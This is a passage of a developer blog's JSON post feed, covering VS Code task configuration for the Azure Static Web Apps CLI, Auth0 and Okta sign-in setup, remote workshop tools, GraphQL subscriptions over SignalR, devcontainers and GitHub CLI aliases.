"start", "problemMatcher": { "owner": "custom", "pattern": { "regexp": "^([^\\\\s].*)\\\\((\\\\d+|\\\\d+,\\\\d+|\\\\d+,\\\\d+,\\\\d+,\\\\d+)\\\\):\\\\s+(error|warning|info)\\\\s+(TS\\\\d+)\\\\s*:\\\\s*(.*)$", "file": 1, "location": 2, "severity": 3, "code": 4, "message": 5 }, "fileLocation": "relative", "background": { "activeOnStart": true, "beginsPattern": "^\\\\.*", "endsPattern": "^\\\\.*To create a production build, use npm run build\\\\." } }, "label": "npm: start", "detail": "react-scripts start", "isBackground": true } Since create-react-app doesn’t have a standard problemMatcher in VS Code (as far as I can tell anyway) we’re going to set the owner as custom and then use the TypeScript pattern (which I shamelessly stole from the docs 🤣). You might need to tweak the regex to get the VS Code problems list to work properly, but this will do for now. With our basic problemMatcher defined, we can add a background section to it and specify the endsPattern to match the string we’re looking for. You’ll also have to provide a beginsPattern, to which I’m lazy and just matching on anything.\nLet’s do a similar thing for the API task:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 { "type": "npm", "script": "start", "path": "api/", "problemMatcher": { "owner": "typescript", "pattern": { "regexp": "^([^\\\\s].*)\\\\((\\\\d+|\\\\d+,\\\\d+|\\\\d+,\\\\d+,\\\\d+,\\\\d+)\\\\):\\\\s+(error|warning|info)\\\\s+(TS\\\\d+)\\\\s*:\\\\s*(.*)$", "file": 1, "location": 2, "severity": 3, "code": 4, "message": 5 }, "background": { "activeOnStart": true, "beginsPattern": "^\\\\.*", "endsPattern": ".*For detailed output, run func with --verbose flag\\\\..*" } }, "label": "npm: start - api", "detail": "npm-run-all --parallel start:host watch", "isBackground": true } Now, we can run the swa start task and everything will launch for us!\nConclusion Azure Static Web Apps just keeps getting better and better. With the CLI, it’s super easy to run a local environment and not have to worry about things like CORS, making it closer to how the deployed app operates. And combining it with these VS Code tasks means that with a few key presses you can get it up and running.\nI’ve added these tasks to the GitHub repo of my Auth0 demo app from the post on using Auth0 with Static Web Apps\n", "id": "2021-05-25-leveling-up-static-web-apps-with-the-cli" }, { "title": "Using Auth0 With Static Web Apps", "url": "https://www.aaron-powell.com/posts/2021-05-13-using-auth0-with-static-web-apps/", "date": "Wed, 12 May 2021 22:49:11 +0000", "tags": [ "javascript", "serverless" ], "description": "With Azure Static Web Apps supporting custom authentication, let's look at how we can use Auth0 as a provider.", "content": "One of my favorite features of (the now General Available) Azure Static Web Apps (SWA) is that in the Standard Tier you can now provide a custom OpenID Connect (OIDC) provider. This gives you a lot more control over who can and can’t access your app.\nIn this post, I want to look at how we can use Auth0 and an OIDC provider for Static Web Apps.\nFor this, you’ll need an Auth0 account, so if you don’t already have one go sign up and maybe have a read of their docs, just so you’re across everything.\nCreating a Static Web App For this demo, we’ll use the React template, but what we’re covering isn’t specific to React, it’ll be applicable anywhere.\nOnce you’ve created your app, we’re going to need to setup a configuration file, so add staticwebapp.config.json to the repo root.\nThis config file is used for controlling a lot of things within our SWA, but the most important part for us is going to be the auth section. Let’s flesh out the skeleton for it:\n1 2 3 4 5 6 7 { "auth": { "identityProviders": { "customOpenIdConnectProviders": {} } } } Great! Now it’s time to setup Auth0.\nCreating an Auth0 application Log into the Auth0 dashboard and navigate through to the Applications section of the portal:\nFrom here, we’re going to select Create Application, give it a name and select Regular Web Applications as the application type. You might be tempted to select the SPA option, given that we’re creating a JavaScript web application, but the reason we don’t use that is that SWA’s auth isn’t handled by your application itself, it’s handled by the underlying Azure service, which is a “web application”, that then exposes the information out that you need.\nConfigure your Auth0 application With your application created, it’s time to configure it. We’ll skip the Quick Start options, as we’re really doing something more custom. Instead, head to Settings as we are going to need to provide the application with some redirect options for login/logout, so that SWA will know you’ve logged in and can unpack the basic user information.\nFor the Sign-in redirect URIs you will need to add https://<hostname>/.auth/login/auth0 for the Application Login URI, https://<hostname>/.auth/login/auth0/callback for Allowed Callback URLs and for Allowed Logout URLs add https://<hostname>/.auth/logout/auth0/callback. If you haven’t yet deployed to Azure, don’t worry about this step yet, we’ll do it once the SWA is created.\nQuick note - the auth0 value here is going to be how we name the provider in the staticwebapp.config.json, so it can be anything you want, I just like to use the provider name so the config is easy to read.\nScroll down and click Save Changes, and it’s time to finish off our SWA config file.\nCompleting our settings With our Auth0 application setup, it’s time to complete our config file so it can use it. We’ll add a new configuration under customOpenIdConnectProviders for Auth0 and it’ll contain two core pieces of information, the information on how to register the OIDC provider and some login information on how to talk to the provider.\nInside registration, we’ll add a clientIdSettingName field, which will point to an entry in the app settings that the SWA has. Next, we’ll need a clientCredential object that has clientSecretSettingName that is the entry for the OIDC client secret. Lastly, we’ll provide the openIdConnectConfiguration with a wellKnownOpenIdConfiguration endpoint that is https://<your_auth0_domain>/.well-known//openid-configuration.\nThe config should now look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 { "auth": { "identityProviders": { "customOpenIdConnectProviders": { "auth0": { "registration": { "clientIdSettingName": "AUTH0_ID", "clientCredential": { "clientSecretSettingName": "AUTH0_SECRET" }, "openIdConnectConfiguration": { "wellKnownOpenIdConfiguration": "https://aaronpowell.au.auth0.com/.well-known/openid-configuration" } } } } } } } I use AUTH0_ID and AUTH0_SECRET as the names of the items I’ll be putting into app settings.\nAll this information will tell SWA how to issue a request against the right application in Auth0, but we still need to tell it how to make the request and handle the response. That’s what we use the login config for. With the login config, we provide a nameClaimType, which is a fully-qualified path to the claim that we want SWA to use as the userDetails field of the user info. Generally speaking, you’ll want this to be http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name, but if there’s a custom field in your response claims you want to use, make sure you provide that. The other bit of config we need here is what scopes to request from Auth0. For SWA, you only need openid and profile as the scopes, unless you’re wanting to use a nameClaimType other than standard.\nLet’s finish off our SWA config:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 { "auth": { "identityProviders": { "customOpenIdConnectProviders": { "auth0": { "registration": { "clientIdSettingName": "AUTH0_ID", "clientCredential": { "clientSecretSettingName": "AUTH0_SECRET" }, "openIdConnectConfiguration": { "wellKnownOpenIdConfiguration": "https://aaronpowell.au.auth0.com/.well-known/openid-configuration" } }, "login": { "nameClaimType": "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name", "scopes": ["openid", "profile"] } } } } } } With the config ready you can create the SWA in Azure and kick off a deployment (don’t forget to update the Auth0 app with the login/logout callbacks). When the resource is created in Azure, copy the Client ID and Client secret from Auth0 and create app settings in Azure using the names in your config and the values from Auth0.\nUsing the provider Once the provider is registered in the config file, it is usable just like the other providers SWA offers, with the login being /.auth/login/<provider_name>, which in this case the provider_name is auth0. The user information will then be exposed as standard to both the web and API components.\nIf you’re building a React application, check out my React auth helper and for the API there is a companion.\nConclusion I really like that with the GA of Static Web Apps we are now able to use custom OIDC providers with the platform. This makes it a lot easier to have controlled user access and integration with a more complex auth story when needed. Setting this up with Auth0 only takes a few lines of config.\nYou can check out a full code sample on my GitHub and a live demo here (but I’m not giving you my Auth0 credentials 😝).\n", "id": "2021-05-13-using-auth0-with-static-web-apps" }, { "title": "Using Okta With Static Web Apps", "url": "https://www.aaron-powell.com/posts/2021-05-13-using-okta-with-static-web-apps/", "date": "Wed, 12 May 2021 22:49:11 +0000", "tags": [ "javascript", "serverless" ], "description": "With Azure Static Web Apps supporting custom authentication, let's look at how we can use Okta as a provider.", "content": "One of my favorite features of (the now General Available) Azure Static Web Apps (SWA) is that in the Standard Tier you can now provide a custom OpenID Connect (OIDC) provider. This gives you a lot more control over who can and can’t access your app.\nIn this post, I want to look at how we can use Okta and an OIDC provider for Static Web Apps.\nFor this, you’ll need an Okta account, so if you don’t already have one go sign up and maybe have a read of their docs, just so you’re across everything.\nCreating a Static Web App For this demo, we’ll use the React template, but what we’re covering isn’t specific to React, it’ll be applicable anywhere.\nOnce you’ve created your app, we’re going to need to setup a configuration file, so add staticwebapp.config.json to the repo root.\nThis config file is used for controlling a lot of things within our SWA, but the most important part for us is going to be the auth section. Let’s flesh out the skeleton for it:\n1 2 3 4 5 6 7 { "auth": { "identityProviders": { "customOpenIdConnectProviders": {} } } } Great! Now it’s time to setup Okta.\nCreating an Okta application Log into the Okta dashboard and navigate through to the Applications section of the portal:\nFrom here, we’re going to select Create App Integration and select OIDC - OpenID Connect for the Sign-on method and Web Application as the Application type. You might be tempted to select the SPA option, given that we’re creating a JavaScript web application, but the reason we don’t use that is that SWA’s auth isn’t handled by your application itself, it’s handled by the underlying Azure service, which is a “web application”, that then exposes the information out that you need.\nConfigure your Okta application With your application created, it’s time to configure it. Give it a name, something that’ll make sense when you see it in the list of Okta applications, a logo if you desire, but leave the Grant type information alone, the defaults are configured for us just fine.\nWe are going to need to provide the application with some redirect options for login/logout, so that SWA will know you’ve logged in and can unpack the basic user information.\nFor the Sign-in redirect URIs you will need to add https://<hostname>/.auth/login/okta/callback and for Sign-out redirect URIs add https://<hostname>/.auth/logout/okta/callback. If you haven’t yet deployed to Azure, don’t worry about this step yet, we’ll do it once the SWA is created.\nQuick note - the okta value here is going to be how we name the provider in the staticwebapp.config.json, so it can be anything you want, I just like to use the provider name so the config is easy to read.\nClick Save, and it’s time to finish off our SWA config file.\nCompleting our settings With our Okta application setup, it’s time to complete our config file so it can use it. We’ll add a new configuration under customOpenIdConnectProviders for Okta and it’ll contain two core pieces of information, the information on how to register the OIDC provider and some login information on how to talk to the provider.\nInside registration, we’ll add a clientIdSettingName field, which will point to an entry in the app settings that the SWA has. Next, we’ll need a clientCredential object that has clientSecretSettingName that is the entry for the OIDC client secret. Lastly, we’ll provide the openIdConnectConfiguration with a wellKnownOpenIdConfiguration endpoint that is https://<your_okta_domain>/.well-known//openid-configuration.\nThe config should now look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 { "auth": { "identityProviders": { "customOpenIdConnectProviders": { "okta": { "registration": { "clientIdSettingName": "OKTA_ID", "clientCredential": { "clientSecretSettingName": "OKTA_SECRET" }, "openIdConnectConfiguration": { "wellKnownOpenIdConfiguration": "https://dev-920852.okta.com/.well-known/openid-configuration" } } } } } } } I use OKTA_ID and OKTA_SECRET as the names of the items I’ll be putting into app settings.\nAll this information will tell SWA how to issue a request against the right application in Okta, but we still need to tell it how to make the request and handle the response. That’s what we use the login config for. With the login config, we provide a nameClaimType, which is a fully-qualified path to the claim that we want SWA to use as the userDetails field of the user info. Generally speaking, you’ll want this to be http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name, but if there’s a custom field in your response claims you want to use, make sure you provide that. The other bit of config we need here is what scopes to request from Okta. For SWA, you only need openid and profile as the scopes, unless you’re wanting to use a nameClaimType other than standard.\nLet’s finish off our SWA config:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 { "auth": { "identityProviders": { "customOpenIdConnectProviders": { "okta": { "registration": { "clientIdSettingName": "OKTA_ID", "clientCredential": { "clientSecretSettingName": "OKTA_SECRET" }, "openIdConnectConfiguration": { "wellKnownOpenIdConfiguration": "https://dev-920852.okta.com/.well-known/openid-configuration" } }, "login": { "nameClaimType": "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name", "scopes": ["openid", "profile"] } } } } } } With the config ready you can create the SWA in Azure and kick off a deployment (don’t forget to update the Okta app with the login/logout callbacks). When the resource is created in Azure, copy the Client ID and Client secret from Okta and create app settings in Azure using the names in your config and the values from Okta.\nUsing the provider Once the provider is registered in the config file, it is usable just like the other providers SWA offers, with the login being /.auth/login/<provider_name>, which in this case the provider_name is okta. The user information will then be exposed as standard to both the web and API components.\nIf you’re building a React application, check out my React auth helper and for the API there is a companion.\nConclusion I really like that with the GA of Static Web Apps we are now able to use custom OIDC providers with the platform. This makes it a lot easier to have controlled user access and integration with a more complex auth story when needed. Setting this up with Okta only takes a few lines of config.\nYou can check out a full code sample on my GitHub and a live demo here (but I’m not giving you my Okta credentials 😝).\n", "id": "2021-05-13-using-okta-with-static-web-apps" }, { "title": "Tools to Make Remote Workshops Easier", "url": "https://www.aaron-powell.com/posts/2021-04-29-tools-to-make-remote-workshops-easier/", "date": "Thu, 29 Apr 2021 03:50:26 +0000", "tags": [ "public-speaking", "conferences", "vscode" ], "description": "While remote workshops can be hard, here's a few tools to make them a little easier.", "content": "I wrote a post last year about my first virtual workshop. Since then I’ve had the opportunity to do more remote workshop, and in doing so I’ve picked up a few tools that I think are really useful for doing them, and possibly even useful for doing in-person workshops in the future, so I thought I’d share my learnings.\nVS Code Devcontainers I posted about devcontainers recently, but let me elaborate a bit more on them from a workshop perspective.\nFirst, a quick recap of devcontainers. A devcontainer is a file that defines a Docker environment that VS Code will detect and load. With the definition file you can pre-install extensions, define VS Code settings and run bootstrapping commands, all of which happen within a Docker container, isolating the environment from the host machine.\nThis contained, predefined environment is really useful when it comes to workshops. One of the hardest things with workshops is that before you can get someone to start tackling the exercises, you have to get them setup. This can mean installing a runtime, but which version of the runtime? I’ve had plenty of workshops where someone has the wrong version of Node or .NET installed, and they fall behind as they have to setup their machine. When running a remote workshop this makes it a lot easier to get someone participating as you can’t sit down with them and help setup their machine.\nIf your workshop requires a more complex environment than a runtime and some exposed ports, say you need a database, messaging queue, etc., you can even pre-install those in the Docker image (or define their install in the Dockerfile) and have them all setup and ready to go. You can even use Docker Compose to define a more complex infrastructure setup that your participants will work from.\nYou can even leverage a remote Docker host so people don’t have to run the Docker container themselves, instead you configure a VM somewhere that they connect to, reducing load on their machine.\nIf you’ve got a workshop that is broken over multiple steps you can configure it so that each step has its own devcontainer, loading the extensions only as they are needed and allow someone to run steps side-by-side. This is an approach I’ve taken with my GraphQL and TypeScript workshop, which has a devcontainer for each step, as well as one for the whole repository.\nCodespaces GitHub Codespaces are in beta at the time of writing.\nWhile devcontainers solve a real problem faced by workshop facilitators (both remote and in-person), it does require participants to have Docker installed. While Docker and containerised development is becoming more common place, it’s not uncommon to have someone who doesn’t have it installed or can’t install it.\nThankfully, there’s another tool on the horizon that offers up some more interesting possibilities, GitHub Codespaces. Codespaces is hosted devcontainers accessed by VS Code in the browser (well, in an over simplified explanation at least). This means that you no longer need to have the requirement to install Docker or even have VS Code installed, participants can open the workshop in the browser on a device as simple as an iPad, but still get the full development experience.\nWith Codespaces, the barrier to entry is now as low as someone having a GitHub account and internet connection, the latter of which they should have to attend an online workshop… 🤔\nLive Share I talked about Live Share in my last post and the more I use it, the more I’m convinced that this is an undervalued tool.\nIf you’re unfamiliar with Live Share, it allows you to make your VS Code (or Visual Studio) instance available to anyone you invite in, making a collaborative editor experience, similar to the likes of Google Docs/Word Online/etc. (and with all the chaos that involves). If you don’t want other messing with your code, you can make the share read-only.\nBut it’s not just giving people a view into your code, they are also able to access any webserver you run and terminals you open (again, these can be read only), set breakpoints and debug alongside you. It even has the same browser-only experience, like you get with Codespaces, meaning that people can join without having to install anything other than a browser.\nAs a participant you are no longer fighting with the limits of technology-over-video. No doubt you’ve experienced watching code over a video conferencing platform, only to have bandwidth drop and the text become fuzzy, or you missed a step and just want to go to another file. With Live Share you can tweak the editor to how you want to see it, bump the font up, change contrasts, even go to a file you missed.\nThen as a facilitator Live Share can be a two-way street. Something that is harder in remote workshops is that you can’t sit down with a participant and help them work through a roadblock as you can’t see their code, but with Live Share they can give you access to their editor and together you can pair-program through it, boosting their confidence in getting through the exercises, and helping you ensure everyone is still on pace with each other.\nI like to add Live Share as an extension in my devcontainer.json, so that participants are all ready to go with it as soon as they run their environment.\nCodeTour CodeTour is an extension I’ve only just started using, and I’m already loving the possibilities of it.\nCodeTour allows you to define a script for someone to follow as they are guided around a workspace. Check it out in my GraphQL and TypeScript workshop:\nThe video shows CodeTour giving us a path to follow around our exercise, along with commands to run in the terminal and code to insert. Everything covered in the steps also exists in the README, but this helps put the participant in the right context for where something goes and what to do next.\nThis can be really useful when you have a self-directed workshop (such as one available as a GitHub repo) or for when people have to tackle an exercise after you have setup the context for but leaving them to “do it themselves”. By having these tours in place, if someone gets lost, they have some guideposts that can get them back on track (again, since you can’t come and sit with them as easily).\nConclusion These three tools I see are really going to make it easier people to deliver remote/online workshops and for participants of them to feel more confident in active participation.\nWhether it’s giving everyone a consistent, predefined environment so you’re removing the “did you install the right version of something?” roadblock by using a devcontainer, giving people direct access into the facilitators editor and a remote facilitator being able to pair-program with a participant using Live Share, or having a built-in script that someone can fall back onto if they get lost without waiting for the facilitator to notice them with a CodeTour. Each of these tools makes it just that little bit more exciting and engaging for doing remote workshops.\nIs there any tools you’ve found useful for remote workshops, either as a facilitator or a participant? Let me know in the comments below!\n", "id": "2021-04-29-tools-to-make-remote-workshops-easier" }, { "title": "Making Auth Simpler for Static Web App APIs", "url": "https://www.aaron-powell.com/posts/2021-03-30-making-auth-simpler-for-static-web-app-apis/", "date": "Tue, 30 Mar 2021 04:51:02 +0000", "tags": [ "azure", "serverless", "javascript" ], "description": "Let's look at how to make it a little easier to work with authenticated Static Web App APIs", "content": "Azure Static Web Apps has built-in Authentication and Authorization for both the web and API part of the application.\nAt the end of last year, I wrote about a package to make it easier in React apps to work with auth and get access to the user details. But this still left a gap in the APIs, your APIs need to parse the JSON out of a custom header, which is base64 encoded. All a bit complicated in my book.\nSo, I decided to make another package to help with that, @aaronpowell/static-web-apps-api-auth.\nUsing the package The package exposes two functions, isAuthenticated and getUserInfo. Here’s an example of an API that uses the package:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { getUserInfo, isAuthenticated } from "@aaronpowell/static-web-apps-api-auth"; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { context.log("HTTP trigger function processed a request."); if (!isAuthenticated(req)) { context.res = { body: "You are not logged in at the moment" }; } else { const { clientPrincipal } = getUserInfo(req); context.res = { body: `Thanks for logging in ${ clientPrincipal.userDetails }. You logged in via ${ clientPrincipal.identityProvider } and have the roles ${clientPrincipal.userRoles.join(", ")}` }; } }; export default httpTrigger; The isAuthenticated function takes the request that the API receives and returns a boolean of whether the user is authenticated or not, and the getUserInfo unpacks the header data into a JavaScript object (with TypeScript typings) that you can work with.\nHopefully this makes it just that bit easier to work with authenticated experiences on Static Web Apps.\n", "id": "2021-03-30-making-auth-simpler-for-static-web-app-apis" }, { "title": "GraphQL on Azure: Part 6 - Subscriptions With SignalR", "url": "https://www.aaron-powell.com/posts/2021-03-15-graphql-on-azure-part-6-subscriptions-with-signalr/", "date": "Mon, 15 Mar 2021 23:31:19 +0000", "tags": [ "azure", "javascript", "graphql" ], "description": "It's time to take a look at how we can do real-time GraphQL using Azure", "content": "In our exploration of how to run GraphQL on Azure, we’ve looked at the two most common aspects of a GraphQL server, queries and mutations, so we can get data and store data. Today, we’re going to look at the third piece of the puzzle, subscriptions.\nWhat are GraphQL Subscriptions In GraphQL, a Subscription is used as a way to provide real-time data to connected clients. Most commonly, this is implemented over a WebSocket connection, but I’m sure you could do it with long polling or Server Sent Events if you really wanted to (I’ve not gone looking for that!). This allows the GraphQL server to broadcast query responses out when an event happens that the client is subscribed to.\nLet’s think about this in the context of the quiz game we’ve been doing. So far the game is modeled for single player, but if we wanted to add multiplayer, we could have the game wait for all players to join, and once they have, broadcast out a message via a subscription that the game is starting.\nDefining Subscriptions Like queries and mutations, subscriptions are defined as part of a GraphQL schema, and they can reuse the types that are available within our schema. Let’s make a really basic schema that contains a subscription:\n1 2 3 4 5 6 7 8 9 10 11 12 type Query { hello: String! } type Subscription { getMessage: String! } schema { query: Query subscription: Subscription } The subscription type that we’re defining can have as many different subscriptions that clients can subscribe via, and each might return different data, it’s completely up to the way your server wants to expose real-time information.\nImplementing Subscriptions on Azure For this implementation, we’re going to go back to TypeScript and use Apollo. Apollo have some really great docs on how to implement subscriptions in an Apollo Server, and that’ll be our starting point.\nBut before we can start pushing messages around, we need to work out what is going to be the messaging backbone of our server. We’re going to need some way in which the server and communicate with all connected clients, either from within a resolver, or from some external event that the server receives.\nIn Azure, when you want to do real-time communications, there’s no better service to use than SignalR Service. SignalR Service takes care of the protocol selection, connection management and scaling that you would require for a real-time application, so it’s ideal for our needs.\nCreating the GraphQL server In the previous posts, we’ve mostly talked about running GraphQL in a serverless model on Azure Functions, but for a server with subscriptions, we’re going to use Azure App Service, and we can’t expose a WebSocket connection from Azure Functions for the clients to connect to.\nApollo provides plenty of middleware options that we can chose from, so for this we’ll use the Express integration, apollo-server-express and follow the subscriptions setup guide.\nAdding Subscriptions with SignalR When it comes to implementing the integration with SignalR, Apollo uses the graphql-subscriptions PubSubEngine class to handle how the broadcasting of messages, and connections from clients.\nSo that means we’re going to need an implementation of that which uses SignalR, and thankfully there is one, @aaronpowell/graphql-signalr-subscriptions (yes, I did write it 😝).\nWe’ll start by adding that to our project:\n1 npm install --save @aaronpowell/graphql-signalr-subscriptions You’ll need to create a SignalR Service resource and get the connection string for it (I use dotenv to inject it for local dev) so you can create PubSub engine. Create a new resolvers.ts file and create the SignalRPubSub instance in it.\n1 2 3 4 5 import { SignalRPubSub } from "@aaronpowell/graphql-signalr-subscriptions"; export const signalrPubSub = new SignalRPubSub( process.env.SIGNALR_CONNECTION_STRING ); We export this so that we can import it in our index.ts and start the client when the server starts:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 // setup ApolloServer httpServer.listen({ port }, () => { console.log( `🚀 Server ready at http://localhost:${port}${server.graphqlPath}` ); console.log( `🚀 Subscriptions ready at ws://localhost:${port}${server.subscriptionsPath}` ); signalrPubSub .start() .then(() => console.log("🚀 SignalR up and running")) .catch((err: any) => console.error(err)); }); It’s important to note that you must call start() on the instance of the PubSub engine, as this establishes the connection with SignalR, and until that happens you won’t be able to send messages.\nCommunicating with a Subscription Let’s use the simple schema from above:\n1 2 3 4 5 6 7 8 9 10 11 12 type Query { hello: String! } type Subscription { getMessage: String! } schema { query: Query subscription: Subscription } In the hello query we’ll broadcast a message, which the getMessage can subscribe to. Let’s start with the hello resolver:\n1 2 3 4 5 6 7 8 9 10 export const resolvers = { Query: { hello() { signalrPubSub.publish("MESSAGE", { getMessage: "Hello I'm a message" }); return "Some message"; } } }; So our hello resolver is going to publish a message with the name MESSAGE and a payload of { getMessage: "..." } to clients. The name is important as it’s what the subscription resolvers will be configured to listen for and the payload represents all the possible fields that someone could select in the subscription.\nNow we’ll add the resolver for the subscription:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 export const resolvers = { Query: { hello() { signalrPubSub.publish("MESSAGE", { getMessage: "Hello I'm a message" }); return "Some message"; } }, Subscription: { getMessage: { subscribe: () => signalrPubSub.asyncIterator(["MESSAGE"]) } } }; A resolver for a subscription is a little different to query/mutation/field resolvers as you need to provide a subscribe method, which is what Apollo will invoke to get back the names of the triggers to be listening on. We’re only listening for MESSAGE here (but also only broadcasting it), but if you added another publish operation with a name of MESSAGE2, then getMessage subscribers wouldn’t receive that. Alternatively, getMessage could be listening to a several trigger names, as it might represent an aggregate view of system events.\nConclusion In this post we’ve been introduced to subscriptions in GraphQL and seen how we can use the Azure SignalR Service as the backend to provide this functionality.\nYou’ll find the code for the SignalR implementation of subscriptions here and the full example here.\n", "id": "2021-03-15-graphql-on-azure-part-6-subscriptions-with-signalr" }, { "title": "Your Open Source Project Needs a devcontainer - Here's Why", "url": "https://www.aaron-powell.com/posts/2021-03-08-your-open-source-project-needs-a-dev-container-heres-why/", "date": "Mon, 08 Mar 2021 00:04:31 +0000", "tags": [ "vscode", "docker", "oss" ], "description": "A look at devcontainers and why you should have them on all projects", "content": "TL;DR: Add a devcontainer to your projects now, you’ll thank me later.\nPrior to joining Microsoft I worked a consultant, so every few months I’d join with a new development team and undertake the dreaded task of any new starter… machine setup. Many of us have been there, you have a wiki page (often outdated) of steps to follow to setup the development environment just right, otherwise you won’t be able to work as intended.\nThese days I do similar things, but instead of it being going into a client, I’m jumping into an open source repo to poke around, try out the quickstarts or contribute back to it, and well, XKCD probably said it best.\nAs a community we celebrate individuality, whether it’s your choice of indentation style, yarn vs npm vs pnpm, linting rules, monorepo tools, etc. that’s entirely up to you as an OSS project maintainer, but as an outsider coming in, that’s where it can be a bit more difficult. When someone comes to your repo there’s a process they’ll go through, first they’ll look for and setup instructions in the README file, “what version of Node/dotnet/Python/etc. is required?”, “what package manager(s) are being used?”, “how does one install all the dependencies?”, and so on. Failing that, it’s digging for a contributors guide, whether that’s a CONTRIBUTING.md file, or a page on a wiki, something that’ll help them get started.\nAll of this starts producing barriers to be able to effectively contribute. Have the wrong version of dotnet and you might not be able to compile. Didn’t realise a linter/formatter was in use can result in a PR failing to meet the code style guide. While dealing with these PR’s as a maintainer is frustrating, it’s equally so for a contributor who has to go back and rework something that they were unaware about to begin with.\nStandardising Environments with devcontainers This is where dev devcontainers come in. A devcontainer is used by the VS Code Remote Containers extension and works by creating a Docker container to do your development in.\nAs the development environment is within Docker, you supply the Dockerfile and VS Code will take care of building the image and starting the container for you. Then since you control the Dockerfile you can have it install any software you need for your project, set the right version of Node, install global packages, etc.\nThis is just a plain old Dockerfile, you can run it without VS Code using the standard Docker tools and mount a volume in, but the power comes when you combine it with the devcontainers.json file, which gives VS Code instructions on how to configure itself.\nUsing eslint + prettier? Tell the devcontainer to install those extensions so the user has them already installed. Want some VS Code settings enabled by default, specify them so users don’t have to know about it.\nCreating a devcontainer You’re going to need VS Code and Docker installed, but also the Remote Extensions pack to give you the Remote Containers extension.\nOpen the command pallette (CTRL/CMD + SHIFT + P) and search for Remote-Containers: Add Development Container Configuration Files. This command will give you a list of possible devcontainers that you and start with (pro tip, the definitions are here), so select the one you want.\nVS Code will detect the devcontainer and ask if you want to open in it, you can or you can wait until we’ve done any changes to the files we want.\nThis will add a .devcontainer folder, along with the starting files you need based off your chosen container (likely Dockerfile and devcontainer.json, but sometimes some auxillary scripts too). You’ll find the ones for this blog here, and if we look at the Dockerfile, it doesn’t do much other than setup dotnet and node, with the versions specified in the devcontainer.json file. Go ahead and add any steps you need for your dev environment, have Docker install more software, whatever is needed.\nNext, open your devcontainer.json file and it’s time to get the VS Code side of things going. Give the devcontainer a name (I called this one Aaron's blog), and set the extensions you want installed by default. I use prettier on my blog to format the markdown, so I’ll make sure that’s installed, along with a spellcheck plugin!\n1 2 3 4 5 6 7 8 9 10 11 { "name": "Aaron's blog", "extensions": [ "ms-dotnettools.csharp", "dbaeumer.vscode-eslint", "esbenp.prettier-vscode", "editorconfig.editorconfig", "streetsidesoftware.code-spell-checker" ] // snip } There are other things that can be configured from the devcontainer.json file. If you’ve got a webserver, you can tell it your exposing those ports, for example. Another handy option is postCreateCommand, which allows you to run commands once the container has started, such as npm install, so as soon someone starts work, everything is ready to go.\nWith all the files ready, we can open the devcontainer by reloading the window (Command Pallette -> Developer: Reload Window) and clicking the notification when it appears to open the container.\nAlso, every time we change either the Dockerfile or devcontainer.json VS Code will detect it and ask if we want to recreate the environment, so we keep ourselves in sync.\nConclusion Devcontainers are awesome, we can use them to define an isolated development environment within Docker that has all that we need, and only what we need, installed in it. This helps simplify people getting into a new codebase by removing the barrier of unknown around what to setup before then can start working. While I talked about this from the standpoint of OSS, the same pattern can be applied to internal company projects. You don’t even have to ship a Dockerfile, you can point the devcontainer.json to a Docker image and speed up the process.\nSo let’s make it easier for people to jump into a codebase by giving them a scripted environment to start with!\nBonus tip - Use with GitHub Codespaces At the time of writing GitHub Codespaces is in private preview, so you’ll need to request access, or wait until it’s publicly available. Update: At GitHub Universe 2022 it was announced that you can get up to 60 hours free Codespaces time with a Free or Pro GitHub account.\nIf you have a devcontainer in your GitHub repo, when you open a GitHub Codespace, it’ll use that definition. This is really awesome, but I don’t think I can do it justice, instead, check out this video my colleague Alvaro did to show it off. He literally can’t contain his excitement.\nImaging being able to jump into a project that runs tools like RabbitMQ, but you don’t need to make sure it’s installed/configured/etc., as the dev environment is already scripted for you.\nYeah, I think this is pretty neat.\n", "id": "2021-03-08-your-open-source-project-needs-a-dev-container-heres-why" }, { "title": "Extending the GitHub CLI", "url": "https://www.aaron-powell.com/posts/2021-01-22-extending-the-github-cli/", "date": "Fri, 22 Jan 2021 15:18:41 +1100", "tags": [ "github", "devops" ], "description": "Let's look at how we can extend the GitHub CLI to give us information about GitHub Actions", "content": "I’ve been using the GitHub CLI a lot recently for my common GitHub tasks, such as cloning and working with PRs, but there’s something else in GitHub that I’ve been using a lot that I can’t do from the CLI, working with Actions, like in my last post about approval workflows.\nNow, this might be a feature that comes soon to the CLI but I’m an impatient person, so I set out to work out how to do it myself.\nCreating custom aliases The GitHub CLI gives us the ability to create our own aliases, this could be useful if you want to, say, create an easy way to list a certain type of issue:\n1 2 3 4 5 6 7 8 9 10 $ gh alias set bugs 'issue list --label="bugs"' - Adding alias for bugs: issue list --label="bugs" ✓ Added alias. $ gh bugs Showing 2 of 7 issues in cli/cli that match your search #19 Pagination request returns empty JSON (bug) #21 Error raised when passing valid parameters (bug) This example is taken from the documentation.\nAwesome, we can create an alias for action, but how can we make it do something? Since we don’t have anything built into the CLI that gives us access to Actions, we’ll need to use the GitHub API.\nCalling the GitHub API I’m going to use the GitHub REST API for Actions, since the GraphQL one doesn’t appear to expose this information at the time of writing.\nSince the API requires us to be authenticated, we can use the gh api command, which uses the currently authenticated user of the GitHub CLI, neat, no credential management for me!\nLet’s start by listing the workflows for the repository, which would see us calling:\n/repos/{owner}/{repo}/actions/workflows But we’re going to need to know the owner and repo information, so how can we get that? Well, the first option is that we can prompt the user for it somehow, but that can break the workflow you might have. Instead, we can leverage the tokenization feature of gh api in which if the API we’re calling has :owner and :repo in the path, it’ll be substituted with the information from the current repo your in. Great! That makes a lot of sense since you’re likely in the git repo on the command line when you want to run it anyway.\nWriting our alias Since this isn’t a simple extension on an existing command, we’ll write 